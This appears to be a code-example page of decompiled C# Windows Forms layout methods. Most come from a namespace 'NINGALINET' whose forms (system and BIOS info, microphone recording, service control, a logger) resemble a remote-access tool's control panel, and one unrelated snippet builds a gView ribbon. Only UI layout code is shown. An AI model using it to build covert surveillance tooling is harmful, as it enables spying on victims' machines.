			global::System.Windows.Forms.ListViewGroup listViewGroup = new global::System.Windows.Forms.ListViewGroup("Server Settings", global::System.Windows.Forms.HorizontalAlignment.Left);
			global::System.Windows.Forms.ListViewGroup listViewGroup2 = new global::System.Windows.Forms.ListViewGroup("Server Connection", global::System.Windows.Forms.HorizontalAlignment.Left);
			global::System.Windows.Forms.ListViewGroup listViewGroup3 = new global::System.Windows.Forms.ListViewGroup("General Information", global::System.Windows.Forms.HorizontalAlignment.Left);
			global::System.Windows.Forms.ListViewGroup listViewGroup4 = new global::System.Windows.Forms.ListViewGroup("System Information", global::System.Windows.Forms.HorizontalAlignment.Left);
			global::System.Windows.Forms.ListViewGroup listViewGroup5 = new global::System.Windows.Forms.ListViewGroup("BIOS Information", global::System.Windows.Forms.HorizontalAlignment.Left);
			this.ContextMenuStrip1 = new global::System.Windows.Forms.ContextMenuStrip(this.components);
			this.RefreshToolStripMenuItem = new global::System.Windows.Forms.ToolStripMenuItem();
			this.AsToolStripMenuItem = new global::System.Windows.Forms.ToolStripSeparator();
			this.SaveToolStripMenuItem = new global::System.Windows.Forms.ToolStripMenuItem();
			this.StatusStrip1 = new global::System.Windows.Forms.StatusStrip();
			this.sl = new global::System.Windows.Forms.ToolStripStatusLabel();
			this.Lv1 = new global::NINGALINET.LV();
			this.ColumnHeader1 = new global::System.Windows.Forms.ColumnHeader();
			this.ColumnHeader2 = new global::System.Windows.Forms.ColumnHeader();
			this.pr = new global::NINGALINET.CHProgressbar();
			this.ContextMenuStrip1.SuspendLayout();
			this.StatusStrip1.SuspendLayout();
			this.SuspendLayout();
			this.ContextMenuStrip1.Items.AddRange(new global::System.Windows.Forms.ToolStripItem[]
			{
				this.RefreshToolStripMenuItem,
				this.AsToolStripMenuItem,
				this.SaveToolStripMenuItem
			});
			this.ContextMenuStrip1.Name = "ContextMenuStrip1";
			global::System.Windows.Forms.Control arg_136_0 = this.ContextMenuStrip1;
			global::System.Drawing.Size size = new global::System.Drawing.Size(153, 76);
			arg_136_0.Size = size;
			this.RefreshToolStripMenuItem.Name = "RefreshToolStripMenuItem";
			global::System.Windows.Forms.ToolStripItem arg_161_0 = this.RefreshToolStripMenuItem;
			size = new global::System.Drawing.Size(152, 22);
			arg_161_0.Size = size;
			this.RefreshToolStripMenuItem.Text = "Refresh";
			this.AsToolStripMenuItem.Name = "AsToolStripMenuItem";
			global::System.Windows.Forms.ToolStripItem arg_19B_0 = this.AsToolStripMenuItem;
			size = new global::System.Drawing.Size(149, 6);
			arg_19B_0.Size = size;
			this.SaveToolStripMenuItem.Name = "SaveToolStripMenuItem";
			global::System.Windows.Forms.ToolStripItem arg_1C6_0 = this.SaveToolStripMenuItem;
			size = new global::System.Drawing.Size(152, 22);
			arg_1C6_0.Size = size;
			this.SaveToolStripMenuItem.Text = "Save As";
			this.StatusStrip1.BackColor = global::System.Drawing.Color.Black;
			this.StatusStrip1.Items.AddRange(new global::System.Windows.Forms.ToolStripItem[]
			{
				this.sl
			});
			global::System.Windows.Forms.Control arg_224_0 = this.StatusStrip1;
			global::System.Drawing.Point location = new global::System.Drawing.Point(0, 340);
			arg_224_0.Location = location;
			this.StatusStrip1.Name = "StatusStrip1";
			global::System.Windows.Forms.Control arg_24F_0 = this.StatusStrip1;
			size = new global::System.Drawing.Size(584, 22);
			arg_24F_0.Size = size;
			this.StatusStrip1.TabIndex = 5;
			this.StatusStrip1.Text = "StatusStrip1";
			this.sl.ForeColor = global::System.Drawing.Color.WhiteSmoke;
			this.sl.Name = "sl";
			global::System.Windows.Forms.ToolStripItem arg_2A3_0 = this.sl;
			size = new global::System.Drawing.Size(13, 17);
			arg_2A3_0.Size = size;
			this.sl.Text = "..";
			this.Lv1.BackColor = global::System.Drawing.Color.Black;
			this.Lv1.BorderStyle = global::System.Windows.Forms.BorderStyle.None;
			this.Lv1.Columns.AddRange(new global::System.Windows.Forms.ColumnHeader[]
			{
				this.ColumnHeader1,
				this.ColumnHeader2
			});
			this.Lv1.ContextMenuStrip = this.ContextMenuStrip1;
			this.Lv1.Dock = global::System.Windows.Forms.DockStyle.Fill;
			this.Lv1.Font = new global::System.Drawing.Font("Arial", 8f);
			this.Lv1.ForeColor = global::System.Drawing.Color.WhiteSmoke;
			this.Lv1.FullRowSelect = true;
			listViewGroup.Header = "Server Settings";
			listViewGroup.Name = "ListViewGroup2";
			listViewGroup2.Header = "Server Connection";
			listViewGroup2.Name = "ListViewGroup4";
			listViewGroup3.Header = "General Information";
			listViewGroup3.Name = "ListViewGroup1";
			listViewGroup4.Header = "System Information";
			listViewGroup4.Name = "ListViewGroup3";
			listViewGroup5.Header = "BIOS Information";
			listViewGroup5.Name = "ListViewGroup5";
			this.Lv1.Groups.AddRange(new global::System.Windows.Forms.ListViewGroup[]
			{
				listViewGroup,
				listViewGroup2,
				listViewGroup3,
				listViewGroup4,
				listViewGroup5
			});
			global::System.Windows.Forms.Control arg_40A_0 = this.Lv1;
			location = new global::System.Drawing.Point(0, 0);
			arg_40A_0.Location = location;
			this.Lv1.Name = "Lv1";
			this.Lv1.OwnerDraw = true;
			global::System.Windows.Forms.Control arg_444_0 = this.Lv1;
			size = new global::System.Drawing.Size(584, 325);
			arg_444_0.Size = size;
			this.Lv1.TabIndex = 9;
			this.Lv1.UseCompatibleStateImageBehavior = false;
			this.Lv1.View = global::System.Windows.Forms.View.Details;
			this.ColumnHeader1.Text = "Name";
			this.ColumnHeader1.Width = 143;
			this.ColumnHeader2.Text = "Value";
			this.pr.BackColor = global::System.Drawing.Color.Transparent;
			this.pr.Colors = new global::NINGALINET.Bloom[0];
			this.pr.Customization = global::NINGALINET.My.Resources.Resources.notf;
			this.pr.Dock = global::System.Windows.Forms.DockStyle.Bottom;
			this.pr.Font = new global::System.Drawing.Font("Verdana", 8f);
			this.pr.Image = null;
			global::System.Windows.Forms.Control arg_516_0 = this.pr;
			location = new global::System.Drawing.Point(0, 325);
			arg_516_0.Location = location;
			this.pr.Maximum = 100;
			this.pr.Name = "pr";
			this.pr.NoRounding = false;
			global::System.Windows.Forms.Control arg_55A_0 = this.pr;
			size = new global::System.Drawing.Size(584, 15);
			arg_55A_0.Size = size;
			this.pr.TabIndex = 8;
			this.pr.Text = "ChProgressbar2";
			this.pr.Transparent = true;
			this.pr.Value = 0;
			global::System.Drawing.SizeF autoScaleDimensions = new global::System.Drawing.SizeF(6f, 14f);
			this.AutoScaleDimensions = autoScaleDimensions;
			this.AutoScaleMode = global::System.Windows.Forms.AutoScaleMode.Font;
			this.BackColor = global::System.Drawing.Color.Black;
			size = new global::System.Drawing.Size(584, 362);
			this.ClientSize = size;
			this.Controls.Add(this.Lv1);
			this.Controls.Add(this.pr);
			this.Controls.Add(this.StatusStrip1);
			this.Font = new global::System.Drawing.Font("Arial", 8.25f, global::System.Drawing.FontStyle.Regular, global::System.Drawing.GraphicsUnit.Point, 0);
			this.ForeColor = global::System.Drawing.Color.WhiteSmoke;
			this.Name = "FrmInformasi";
			this.ShowIcon = false;
			this.StartPosition = global::System.Windows.Forms.FormStartPosition.CenterScreen;
			this.Text = "Form2";
			this.ContextMenuStrip1.ResumeLayout(false);
			this.StatusStrip1.ResumeLayout(false);
			this.StatusStrip1.PerformLayout();
			this.ResumeLayout(false);
			this.PerformLayout();
		}
        private void InitializeComponent()
        {
            this.components              = new global::System.ComponentModel.Container();
            this.Label1                  = new global::System.Windows.Forms.Label();
            this.ContextMenuStrip2       = new global::System.Windows.Forms.ContextMenuStrip(this.components);
            this.PlayToolStripMenuItem   = new global::System.Windows.Forms.ToolStripMenuItem();
            this.StopToolStripMenuItem   = new global::System.Windows.Forms.ToolStripMenuItem();
            this.AToolStripMenuItem      = new global::System.Windows.Forms.ToolStripSeparator();
            this.RemoveToolStripMenuItem = new global::System.Windows.Forms.ToolStripMenuItem();
            this.ContextMenuStrip1       = new global::System.Windows.Forms.ContextMenuStrip(this.components);
            this.NumericUpDown1          = new global::System.Windows.Forms.NumericUpDown();
            this.StatusStrip1            = new global::System.Windows.Forms.StatusStrip();
            this.sl            = new global::System.Windows.Forms.ToolStripStatusLabel();
            this.Button1       = new global::System.Windows.Forms.Button();
            this.Panel1        = new global::System.Windows.Forms.Panel();
            this.ColumnHeader1 = new global::System.Windows.Forms.ColumnHeader();
            this.Lv1           = new global::NINGALINET.LV();
            this.ColumnHeader2 = new global::System.Windows.Forms.ColumnHeader();
            this.ContextMenuStrip2.SuspendLayout();
            ((global::System.ComponentModel.ISupportInitialize) this.NumericUpDown1).BeginInit();
            this.StatusStrip1.SuspendLayout();
            this.Panel1.SuspendLayout();
            this.SuspendLayout();
            this.Label1.AutoSize  = true;
            this.Label1.ForeColor = global::System.Drawing.Color.WhiteSmoke;
            global::System.Windows.Forms.Control arg_11C_0 = this.Label1;
            global::System.Drawing.Point         location  = new global::System.Drawing.Point(84, 12);
            arg_11C_0.Location = location;
            this.Label1.Name   = "Label1";
            global::System.Windows.Forms.Control arg_143_0 = this.Label1;
            global::System.Drawing.Size          size      = new global::System.Drawing.Size(27, 14);
            arg_143_0.Size       = size;
            this.Label1.TabIndex = 2;
            this.Label1.Text     = "Sec";
            this.ContextMenuStrip2.Items.AddRange(new global::System.Windows.Forms.ToolStripItem[]
            {
                this.PlayToolStripMenuItem,
                this.StopToolStripMenuItem,
                this.AToolStripMenuItem,
                this.RemoveToolStripMenuItem
            });
            this.ContextMenuStrip2.Name = "ContextMenuStrip2";
            global::System.Windows.Forms.Control arg_1C2_0 = this.ContextMenuStrip2;
            size           = new global::System.Drawing.Size(113, 76);
            arg_1C2_0.Size = size;
            this.PlayToolStripMenuItem.Name = "PlayToolStripMenuItem";
            global::System.Windows.Forms.ToolStripItem arg_1E9_0 = this.PlayToolStripMenuItem;
            size           = new global::System.Drawing.Size(112, 22);
            arg_1E9_0.Size = size;
            this.PlayToolStripMenuItem.Text = "Play";
            this.StopToolStripMenuItem.Name = "StopToolStripMenuItem";
            global::System.Windows.Forms.ToolStripItem arg_220_0 = this.StopToolStripMenuItem;
            size           = new global::System.Drawing.Size(112, 22);
            arg_220_0.Size = size;
            this.StopToolStripMenuItem.Text = "Stop";
            this.AToolStripMenuItem.Name    = "AToolStripMenuItem";
            global::System.Windows.Forms.ToolStripItem arg_256_0 = this.AToolStripMenuItem;
            size           = new global::System.Drawing.Size(109, 6);
            arg_256_0.Size = size;
            this.RemoveToolStripMenuItem.Name = "RemoveToolStripMenuItem";
            global::System.Windows.Forms.ToolStripItem arg_27D_0 = this.RemoveToolStripMenuItem;
            size           = new global::System.Drawing.Size(112, 22);
            arg_27D_0.Size = size;
            this.RemoveToolStripMenuItem.Text = "Remove";
            this.ContextMenuStrip1.Name       = "ContextMenuStrip1";
            global::System.Windows.Forms.Control arg_2B3_0 = this.ContextMenuStrip1;
            size           = new global::System.Drawing.Size(61, 4);
            arg_2B3_0.Size = size;
            this.NumericUpDown1.BackColor   = global::System.Drawing.Color.FromArgb(40, 40, 40);
            this.NumericUpDown1.BorderStyle = global::System.Windows.Forms.BorderStyle.FixedSingle;
            this.NumericUpDown1.ForeColor   = global::System.Drawing.Color.WhiteSmoke;
            global::System.Windows.Forms.Control arg_2FC_0 = this.NumericUpDown1;
            location           = new global::System.Drawing.Point(121, 10);
            arg_2FC_0.Location = location;
            global::System.Windows.Forms.NumericUpDown arg_331_0 = this.NumericUpDown1;
            decimal num = new decimal(new int[]
            {
                10000,
                0,
                0,
                0
            });

            arg_331_0.Maximum        = num;
            this.NumericUpDown1.Name = "NumericUpDown1";
            global::System.Windows.Forms.Control arg_358_0 = this.NumericUpDown1;
            size           = new global::System.Drawing.Size(71, 20);
            arg_358_0.Size = size;
            this.NumericUpDown1.TabIndex = 4;
            global::System.Windows.Forms.NumericUpDown arg_396_0 = this.NumericUpDown1;
            num = new decimal(new int[]
            {
                10,
                0,
                0,
                0
            });
            arg_396_0.Value             = num;
            this.StatusStrip1.BackColor = global::System.Drawing.Color.Black;
            this.StatusStrip1.Items.AddRange(new global::System.Windows.Forms.ToolStripItem[]
            {
                this.sl
            });
            global::System.Windows.Forms.Control arg_3E0_0 = this.StatusStrip1;
            location                     = new global::System.Drawing.Point(0, 256);
            arg_3E0_0.Location           = location;
            this.StatusStrip1.Name       = "StatusStrip1";
            this.StatusStrip1.RenderMode = global::System.Windows.Forms.ToolStripRenderMode.Professional;
            global::System.Windows.Forms.Control arg_416_0 = this.StatusStrip1;
            size                       = new global::System.Drawing.Size(462, 24);
            arg_416_0.Size             = size;
            this.StatusStrip1.TabIndex = 8;
            this.StatusStrip1.Text     = "StatusStrip1";
            this.StatusStrip1.Visible  = false;
            this.sl.ForeColor          = global::System.Drawing.Color.WhiteSmoke;
            this.sl.Name               = "sl";
            global::System.Windows.Forms.ToolStripItem arg_475_0 = this.sl;
            size                   = new global::System.Drawing.Size(13, 19);
            arg_475_0.Size         = size;
            this.sl.Text           = "..";
            this.Button1.BackColor = global::System.Drawing.Color.FromArgb(20, 20, 20);
            this.Button1.FlatStyle = global::System.Windows.Forms.FlatStyle.Popup;
            this.Button1.ForeColor = global::System.Drawing.Color.WhiteSmoke;
            global::System.Windows.Forms.Control arg_4CC_0 = this.Button1;
            location           = new global::System.Drawing.Point(3, 6);
            arg_4CC_0.Location = location;
            this.Button1.Name  = "Button1";
            global::System.Windows.Forms.Control arg_4F3_0 = this.Button1;
            size                  = new global::System.Drawing.Size(75, 25);
            arg_4F3_0.Size        = size;
            this.Button1.TabIndex = 9;
            this.Button1.Text     = "Start";
            this.Button1.UseVisualStyleBackColor = false;
            this.Panel1.Controls.Add(this.Button1);
            this.Panel1.Controls.Add(this.Label1);
            this.Panel1.Controls.Add(this.NumericUpDown1);
            this.Panel1.Dock = global::System.Windows.Forms.DockStyle.Bottom;
            global::System.Windows.Forms.Control arg_583_0 = this.Panel1;
            location           = new global::System.Drawing.Point(0, 326);
            arg_583_0.Location = location;
            this.Panel1.Name   = "Panel1";
            global::System.Windows.Forms.Control arg_5AD_0 = this.Panel1;
            size                     = new global::System.Drawing.Size(584, 36);
            arg_5AD_0.Size           = size;
            this.Panel1.TabIndex     = 10;
            this.ColumnHeader1.Text  = "Name";
            this.ColumnHeader1.Width = 63;
            this.Lv1.BackColor       = global::System.Drawing.Color.Black;
            this.Lv1.BorderStyle     = global::System.Windows.Forms.BorderStyle.None;
            this.Lv1.Columns.AddRange(new global::System.Windows.Forms.ColumnHeader[]
            {
                this.ColumnHeader1,
                this.ColumnHeader2
            });
            this.Lv1.ContextMenuStrip = this.ContextMenuStrip2;
            this.Lv1.Dock             = global::System.Windows.Forms.DockStyle.Fill;
            this.Lv1.Font             = new global::System.Drawing.Font("Arial", 8f);
            this.Lv1.ForeColor        = global::System.Drawing.Color.WhiteSmoke;
            this.Lv1.FullRowSelect    = true;
            this.Lv1.HeaderStyle      = global::System.Windows.Forms.ColumnHeaderStyle.Nonclickable;
            global::System.Windows.Forms.Control arg_695_0 = this.Lv1;
            location           = new global::System.Drawing.Point(0, 0);
            arg_695_0.Location = location;
            this.Lv1.Name      = "Lv1";
            this.Lv1.OwnerDraw = true;
            global::System.Windows.Forms.Control arg_6CE_0 = this.Lv1;
            size              = new global::System.Drawing.Size(584, 326);
            arg_6CE_0.Size    = size;
            this.Lv1.TabIndex = 11;
            this.Lv1.UseCompatibleStateImageBehavior = false;
            this.Lv1.View           = global::System.Windows.Forms.View.Details;
            this.ColumnHeader2.Text = "DateTime";
            global::System.Drawing.SizeF autoScaleDimensions = new global::System.Drawing.SizeF(7f, 14f);
            this.AutoScaleDimensions = autoScaleDimensions;
            this.AutoScaleMode       = global::System.Windows.Forms.AutoScaleMode.Font;
            this.BackColor           = global::System.Drawing.Color.Black;
            size            = new global::System.Drawing.Size(584, 362);
            this.ClientSize = size;
            this.Controls.Add(this.Lv1);
            this.Controls.Add(this.Panel1);
            this.Controls.Add(this.StatusStrip1);
            this.Font          = new global::System.Drawing.Font("Arial", 8.25f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
            this.Name          = "FrmMic";
            this.ShowIcon      = false;
            this.StartPosition = global::System.Windows.Forms.FormStartPosition.CenterScreen;
            this.Text          = "FMic";
            this.ContextMenuStrip2.ResumeLayout(false);
            ((global::System.ComponentModel.ISupportInitialize) this.NumericUpDown1).EndInit();
            this.StatusStrip1.ResumeLayout(false);
            this.StatusStrip1.PerformLayout();
            this.Panel1.ResumeLayout(false);
            this.Panel1.PerformLayout();
            this.ResumeLayout(false);
            this.PerformLayout();
        }
Exemple #12
0
        public void MakeRibbon()
        {
            PlugInManager pm = new PlugInManager();

            foreach (IExplorerRibbonTab exRibbonTab in OrderedPluginList <IExplorerRibbonTab> .Sort(
                         pm.GetPlugins(gView.Framework.system.Plugins.Type.IExplorerRibbonTab).Select(p => pm.CreateInstance <IExplorerRibbonTab>(p))))
            {
                Fluent.RibbonTabItem tabItem = new Fluent.RibbonTabItem();
                tabItem.Header = exRibbonTab.Header;
                ribbon.Tabs.Add(tabItem);
                tabItem.DataContext = exRibbonTab;

                foreach (RibbonGroupBox exGroupBox in exRibbonTab.Groups)
                {
                    Fluent.RibbonGroupBox groupBox = new Fluent.RibbonGroupBox();
                    groupBox.Header = exGroupBox.Header;
                    tabItem.Groups.Add(groupBox);

                    foreach (RibbonItem cartoRibbonItem in exGroupBox.Items)
                    {
                        Guid toolGUID = cartoRibbonItem.Guid;
                        if (toolGUID == new Guid("00000000-0000-0000-0000-000000000000"))
                        {
                            groupBox.Items.Add(new Separator());
                            continue;
                        }

                        object tool = pm.CreateInstance(toolGUID);
                        if (tool == null)
                        {
                            continue;
                        }

                        #region IToolItem
                        if (tool is IToolItem)
                        {
                            if (((IToolItem)tool).ToolItem != null)
                            {
                                if (((IToolItem)tool).ToolItem is global::System.Windows.Forms.ToolStripItem)
                                {
                                    StackPanel panel = new StackPanel();
                                    panel.Margin = new Thickness(0, 32, 0, 0);

                                    global::System.Windows.Forms.ToolStripItem stripItem = ((IToolItem)tool).ToolItem;

                                    global::System.Windows.Forms.MenuStrip bar = new global::System.Windows.Forms.MenuStrip();
                                    bar.BackColor = global::System.Drawing.Color.Transparent; //.FromArgb(223, 234, 246);

                                    bar.Items.Add(stripItem);

                                    WindowsFormsHost host = new WindowsFormsHost();
                                    host.Background = new SolidColorBrush(Color.FromRgb(223, 234, 246));
                                    host.Child      = bar;

                                    if (tool is IToolItemLabel)
                                    {
                                        IToolItemLabel label = (IToolItemLabel)tool;
                                        panel.Orientation = label.LabelPosition == ToolItemLabelPosition.top ||
                                                            label.LabelPosition == ToolItemLabelPosition.bottom ? Orientation.Vertical : Orientation.Horizontal;

                                        if (panel.Orientation == Orientation.Vertical)
                                        {
                                            panel.Margin = new Thickness(0, 13, 0, 0);
                                        }

                                        TextBlock text = new TextBlock();
                                        text.Text    = label.Label;
                                        text.Padding = new Thickness(3);

                                        if (label.LabelPosition == ToolItemLabelPosition.top || label.LabelPosition == ToolItemLabelPosition.left)
                                        {
                                            panel.Children.Insert(0, text);
                                        }
                                        else
                                        {
                                            panel.Children.Add(text);
                                        }
                                    }

                                    panel.Children.Add(host);

                                    groupBox.Items.Add(panel);
                                }
                            }
                        }
                        #endregion

                        #region IToolMenu
                        else if (tool is IExToolMenu)
                        {
                            DropDownToolButton button = new DropDownToolButton(tool as IExToolMenu);
                            button.Click += new RoutedEventHandler(ToolButton_Click);
                            groupBox.Items.Add(button);
                        }
                        #endregion

                        #region ITool
                        else if (tool is IExTool)
                        {
                            ((IExTool)tool).OnCreate(_application);
                            ToolButton button = new ToolButton(tool as IExTool);
                            button.SizeDefinition = cartoRibbonItem.SizeDefinition;

                            groupBox.Items.Add(button);
                            button.Click += new RoutedEventHandler(ToolButton_Click);
                        }
                        #endregion
                    }
                }

                if (ribbon.Tabs.Count == 1)
                {
                    #region Favorites
                    Fluent.RibbonGroupBox favBox = new Fluent.RibbonGroupBox();
                    favBox.Header             = String.Empty;
                    _favDropDownButton        = new Fluent.DropDownButton();
                    _favDropDownButton.Header = "Favorites";
                    _favDropDownButton.Icon   = _favDropDownButton.LargeIcon = ImageFactory.FromBitmap(global::gView.Win.DataExplorer.Properties.Resources.folder_heart);

                    Fluent.MenuItem add2fav = new Fluent.MenuItem();
                    add2fav.Header = "Add to favorites...";
                    add2fav.Icon   = ImageFactory.FromBitmap(global::gView.Win.DataExplorer.Properties.Resources.folder_heart);
                    add2fav.Click += new RoutedEventHandler(Add2Favorites_Click);
                    _favDropDownButton.Items.Add(add2fav);

                    bool first = true;
                    foreach (MyFavorites.Favorite fav in (new MyFavorites().Favorites))
                    {
                        if (fav == null)
                        {
                            continue;
                        }

                        WpfFavoriteMenuItem fItem = new WpfFavoriteMenuItem(fav);
                        fItem.Click += new RoutedEventHandler(MenuItem_Favorite_Click);

                        if (first)
                        {
                            first = false;
                            _favDropDownButton.Items.Add(new Separator());
                        }
                        _favDropDownButton.Items.Add(fItem);
                    }

                    favBox.Items.Add(_favDropDownButton);
                    ribbon.Tabs[0].Groups.Add(favBox);
                    #endregion

                    _createNewRibbonGroupBox            = new Fluent.RibbonGroupBox();
                    _createNewRibbonGroupBox.Header     = "Create New";
                    _createNewRibbonGroupBox.Visibility = Visibility.Visible;
                    _createNewRibbonGroupBox.Background = new SolidColorBrush(Colors.GreenYellow);

                    ribbon.Tabs[0].Groups.Add(_createNewRibbonGroupBox);
                }
            }

            #region Options
            Fluent.RibbonTabItem optionsTab = new Fluent.RibbonTabItem()
            {
                Header = "Options"
            };
            Fluent.RibbonGroupBox optionsBox = new Fluent.RibbonGroupBox()
            {
                Header = String.Empty
            };
            optionsTab.Groups.Add(optionsBox);

            foreach (var pageType in pm.GetPlugins(gView.Framework.system.Plugins.Type.IExplorerOptionPage))
            {
                IExplorerOptionPage page = pm.CreateInstance <IExplorerOptionPage>(pageType);
                if (page == null)
                {
                    continue;
                }

                OptionsButton button = new OptionsButton(page);
                button.Click += new RoutedEventHandler(OptoinButton_Click);
                optionsBox.Items.Add(button);
            }
            ribbon.Tabs.Add(optionsTab);
            #endregion
        }
 private void InitializeComponent()
 {
     this.components             = new global::System.ComponentModel.Container();
     this.ContextMenuStrip1      = new global::System.Windows.Forms.ContextMenuStrip(this.components);
     this.ToolStripMenuItem1     = new global::System.Windows.Forms.ToolStripMenuItem();
     this.AToolStripMenuItem     = new global::System.Windows.Forms.ToolStripSeparator();
     this.StartToolStripMenuItem = new global::System.Windows.Forms.ToolStripMenuItem();
     this.PauseToolStripMenuItem = new global::System.Windows.Forms.ToolStripMenuItem();
     this.StopToolStripMenuItem  = new global::System.Windows.Forms.ToolStripMenuItem();
     this.L3             = new global::NINGALINET.LV();
     this.ColumnHeader6  = new global::System.Windows.Forms.ColumnHeader();
     this.ColumnHeader7  = new global::System.Windows.Forms.ColumnHeader();
     this.ColumnHeader8  = new global::System.Windows.Forms.ColumnHeader();
     this.ColumnHeader9  = new global::System.Windows.Forms.ColumnHeader();
     this.ColumnHeader10 = new global::System.Windows.Forms.ColumnHeader();
     this.pr             = new global::NINGALINET.CHProgressbar();
     this.StatusStrip1   = new global::System.Windows.Forms.StatusStrip();
     this.SL             = new global::System.Windows.Forms.ToolStripStatusLabel();
     this.ContextMenuStrip1.SuspendLayout();
     this.StatusStrip1.SuspendLayout();
     this.SuspendLayout();
     this.ContextMenuStrip1.Items.AddRange(new global::System.Windows.Forms.ToolStripItem[]
     {
         this.ToolStripMenuItem1,
         this.AToolStripMenuItem,
         this.StartToolStripMenuItem,
         this.PauseToolStripMenuItem,
         this.StopToolStripMenuItem
     });
     this.ContextMenuStrip1.Name = "ContextMenuStrip1";
     global::System.Windows.Forms.Control arg_139_0 = this.ContextMenuStrip1;
     global::System.Drawing.Size          size      = new global::System.Drawing.Size(114, 98);
     arg_139_0.Size = size;
     this.ToolStripMenuItem1.Name = "ToolStripMenuItem1";
     global::System.Windows.Forms.ToolStripItem arg_160_0 = this.ToolStripMenuItem1;
     size           = new global::System.Drawing.Size(113, 22);
     arg_160_0.Size = size;
     this.ToolStripMenuItem1.Text = "Refresh";
     this.AToolStripMenuItem.Name = "AToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_196_0 = this.AToolStripMenuItem;
     size           = new global::System.Drawing.Size(110, 6);
     arg_196_0.Size = size;
     this.StartToolStripMenuItem.Name = "StartToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_1BD_0 = this.StartToolStripMenuItem;
     size           = new global::System.Drawing.Size(113, 22);
     arg_1BD_0.Size = size;
     this.StartToolStripMenuItem.Text = "Start";
     this.PauseToolStripMenuItem.Name = "PauseToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_1F4_0 = this.PauseToolStripMenuItem;
     size           = new global::System.Drawing.Size(113, 22);
     arg_1F4_0.Size = size;
     this.PauseToolStripMenuItem.Text = "Pause";
     this.StopToolStripMenuItem.Name  = "StopToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_22B_0 = this.StopToolStripMenuItem;
     size           = new global::System.Drawing.Size(113, 22);
     arg_22B_0.Size = size;
     this.StopToolStripMenuItem.Text = "Stop";
     this.L3.BackColor   = global::System.Drawing.Color.Black;
     this.L3.BorderStyle = global::System.Windows.Forms.BorderStyle.None;
     this.L3.Columns.AddRange(new global::System.Windows.Forms.ColumnHeader[]
     {
         this.ColumnHeader6,
         this.ColumnHeader7,
         this.ColumnHeader8,
         this.ColumnHeader9,
         this.ColumnHeader10
     });
     this.L3.ContextMenuStrip = this.ContextMenuStrip1;
     this.L3.Dock             = global::System.Windows.Forms.DockStyle.Fill;
     this.L3.Font             = new global::System.Drawing.Font("Arial", 8f);
     this.L3.ForeColor        = global::System.Drawing.Color.WhiteSmoke;
     this.L3.FullRowSelect    = true;
     global::System.Windows.Forms.Control arg_304_0 = this.L3;
     global::System.Drawing.Point         location  = new global::System.Drawing.Point(0, 0);
     arg_304_0.Location = location;
     this.L3.Name       = "L3";
     this.L3.OwnerDraw  = true;
     global::System.Windows.Forms.Control arg_33D_0 = this.L3;
     size             = new global::System.Drawing.Size(584, 325);
     arg_33D_0.Size   = size;
     this.L3.TabIndex = 32;
     this.L3.UseCompatibleStateImageBehavior = false;
     this.L3.View              = global::System.Windows.Forms.View.Details;
     this.ColumnHeader6.Text   = "Name";
     this.ColumnHeader7.Text   = "Display Name";
     this.ColumnHeader8.Text   = "Type";
     this.ColumnHeader9.Text   = "Status";
     this.ColumnHeader10.Text  = "Can Stop?";
     this.ColumnHeader10.Width = 83;
     this.pr.BackColor         = global::System.Drawing.Color.Transparent;
     this.pr.Colors            = new global::NINGALINET.Bloom[0];
     this.pr.Customization     = global::NINGALINET.My.Resources.Resources.notf;
     this.pr.Dock              = global::System.Windows.Forms.DockStyle.Bottom;
     this.pr.Font              = new global::System.Drawing.Font("Verdana", 8f);
     this.pr.Image             = null;
     global::System.Windows.Forms.Control arg_43B_0 = this.pr;
     location           = new global::System.Drawing.Point(0, 325);
     arg_43B_0.Location = location;
     this.pr.Maximum    = 100;
     this.pr.Name       = "pr";
     this.pr.NoRounding = false;
     global::System.Windows.Forms.Control arg_47E_0 = this.pr;
     size                        = new global::System.Drawing.Size(584, 15);
     arg_47E_0.Size              = size;
     this.pr.TabIndex            = 31;
     this.pr.Text                = "ChProgressbar1";
     this.pr.Transparent         = true;
     this.pr.Value               = 0;
     this.StatusStrip1.BackColor = global::System.Drawing.Color.Black;
     this.StatusStrip1.Items.AddRange(new global::System.Windows.Forms.ToolStripItem[]
     {
         this.SL
     });
     global::System.Windows.Forms.Control arg_4FD_0 = this.StatusStrip1;
     location               = new global::System.Drawing.Point(0, 340);
     arg_4FD_0.Location     = location;
     this.StatusStrip1.Name = "StatusStrip1";
     global::System.Windows.Forms.Control arg_527_0 = this.StatusStrip1;
     size           = new global::System.Drawing.Size(584, 22);
     arg_527_0.Size = size;
     this.StatusStrip1.SizingGrip = false;
     this.StatusStrip1.TabIndex   = 30;
     this.StatusStrip1.Text       = "StatusStrip1";
     this.SL.ForeColor            = global::System.Drawing.Color.WhiteSmoke;
     this.SL.Name = "SL";
     global::System.Windows.Forms.ToolStripItem arg_587_0 = this.SL;
     size           = new global::System.Drawing.Size(13, 17);
     arg_587_0.Size = size;
     this.SL.Text   = "..";
     global::System.Drawing.SizeF autoScaleDimensions = new global::System.Drawing.SizeF(6f, 13f);
     this.AutoScaleDimensions = autoScaleDimensions;
     this.AutoScaleMode       = global::System.Windows.Forms.AutoScaleMode.Font;
     this.BackColor           = global::System.Drawing.Color.Black;
     size            = new global::System.Drawing.Size(584, 362);
     this.ClientSize = size;
     this.Controls.Add(this.L3);
     this.Controls.Add(this.pr);
     this.Controls.Add(this.StatusStrip1);
     this.Name          = "FrmServices";
     this.ShowIcon      = false;
     this.StartPosition = global::System.Windows.Forms.FormStartPosition.CenterScreen;
     this.Text          = "FrmServices";
     this.ContextMenuStrip1.ResumeLayout(false);
     this.StatusStrip1.ResumeLayout(false);
     this.StatusStrip1.PerformLayout();
     this.ResumeLayout(false);
     this.PerformLayout();
 }
Exemple #14
0

        
 private void InitializeComponent()
 {
     this.components = new global::System.ComponentModel.Container();
     global::System.ComponentModel.ComponentResourceManager componentResourceManager = new global::System.ComponentModel.ComponentResourceManager(typeof(global::NINGALINET.FrmLogger));
     this.ContextMenuStrip1          = new global::System.Windows.Forms.ContextMenuStrip(this.components);
     this.RefreshToolStripMenuItem   = new global::System.Windows.Forms.ToolStripMenuItem();
     this.AToolStripMenuItem         = new global::System.Windows.Forms.ToolStripSeparator();
     this.SaveAsToolStripMenuItem    = new global::System.Windows.Forms.ToolStripMenuItem();
     this.SelectAllToolStripMenuItem = new global::System.Windows.Forms.ToolStripMenuItem();
